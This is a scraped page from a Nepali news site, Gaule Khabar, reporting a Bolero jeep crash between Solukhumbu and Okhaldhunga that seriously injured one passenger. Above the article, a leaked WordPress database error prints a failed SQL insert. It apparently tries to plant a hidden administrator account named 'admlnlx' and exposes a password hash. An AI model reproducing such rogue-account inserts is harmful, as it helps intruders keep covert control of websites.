WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3XFzsotLNfys7Wb09ibc.CiZxd5o60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 20:47:34', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुबाट छुटेको बोलेरो दुर्घटना – Gaule Khabar

सोलुखुम्बुबाट छुटेको बोलेरो दुर्घटना

सोलुखुम्बुबाट छुटेको बोलेरो दुर्घटना

काठमाण्डौ । सोलुखुम्बुबाट ओखलढुंगाका लागि छुटेको बोलेरो दुर्घटना हुँदा एक जना गम्भिर घाईते भएका छन् ।
सल्लेरीबाट छुटेको प्रदेश १–०७–००१ च ०००५ नम्बरको बोलेरो शुक्रबार अपरान्ह ओखलढुंगाको रमाइलोडाँडामा दुर्घटना भएको हो । दुर्घटना हुदा सिद्धिचरण नगरपालिका ७ विगुटारका ४४ वर्षीय नाम्गेल शेर्पा गम्भीर घाइते भएको जिल्ला प्रहरी कार्यालय ओखलढुंगाले जनाएको छ ।

शेर्पाको टाउकोमा चोट लागेका हुदा ओखलढुंगा सामुदायिक अस्पतालमा उपचार भईरहेको प्रहरीले जनाएको छ । बोलेरो अनियन्त्रित भएर सडकमुनि खसेको प्रत्यक्षदर्शीले बताएका छन् । बोलेरोमा चालकसहित ४ जना सवार थिए । अन्यको अवस्था भने सामान्य रहेको जनाएको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका